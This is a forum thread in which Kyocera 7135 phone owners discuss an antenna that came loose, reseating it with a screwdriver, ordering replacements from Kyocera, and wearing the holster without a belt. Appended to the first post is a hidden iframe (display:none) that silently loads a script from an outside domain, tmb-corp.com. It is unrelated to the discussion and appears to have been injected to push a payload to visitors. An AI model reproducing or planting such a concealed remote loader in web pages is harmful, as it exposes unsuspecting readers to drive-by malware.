+ Reply to Thread

Broken antenna-not, I think

My antenna pulled right out of the phone. Thought it had broken. Then I noticed a screw at the anchor end. I pushed antenna back, turned in direction of tightening screw, and it's reseated. I'll write back if there are signal performance issues.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Search is my friend,

So, this happened to me yesterday. I've had my 7135 (Phred is his name) for a couple of weeks now, and it doesn't seem to coexist peacefully with the seat belt in my car (I use the holster, and usually hook it on my pocket, since I rarely wear a belt.

Yesterday, I unbuckled my seat belt, and ejected the 7135 from the holster for about the 3rd time. Annoying, but I'll get used to it soon, I hope. However, this time, when I was outside the car, putting him back in the holster, I noticed the antenna was gone! Panic! My baby is wounded!

I immediately found the antenna on the ground next to the car (Huh? How did it get outside the car?), and screwed it back in, no problem. Everything is good--no permanent damage. Note: I couldn't use my old Startac antenna wrench because the screwey part (sorry to get technical is recessed so far on the 7135.

The interesting part was that using a long thin screwdriver to tighten the antenna, I felt a distinct change in resistance just before the antenna seated firmly (contact being made, I imagined?). And, today it seems that most places in my house I have an extra bar on my signal strength indicator. (I usually have no bars or one bar, and now I seem to have one or two.)

Maybe--I'm extremely suggestible (I like to think I have a firm control over reality--who's in charge here, after all? , so I might be imagining it.

Anyway, you might want to snug up those antennae, boys and girls. Are spares available, yet?

St

Yes ant spares are availible and it was one of the first things I ordered from Kyocera. Comes with a little tool to help install or tighten it. The rest of my stuff I got from Danscellphones

Yes, the Kyo online store lists a "Replacement Antenna."

Glad your phone is safe! I dropped mine onto a carpeted floor the other day, and boy was I freaked! Luckily, it was fine.

Not to comment on phone-wearing choices , but one thing I find about the belt holster-- It seems to work just as well without the belt. I use my phone as an MP3 player while jogging, and have experimented with pockets, etc., and what I find is that the nice big hook on the end does a good job in the waistband of most pants, shorts, sweats, etc..

> Not to comment on phone-wearing
    > choices , but one thing I find about
    > the belt holster-- It seems to work
    > just as well without the belt.

Actually, tuboCat, I lied about the non-belt issue. Truth is, that plastic clip is too uncomfortable when I sit down, on or off of a belt. Probably something to do with the fact that I'm old and fat. ;-( The old 6035 leather pouch clip didn't dig into me like this one does, so I clip it on my pocket. I hope the Kyocera's 7135 pouch uses the same clip as the 6035, but I haven't seen one, yet.

St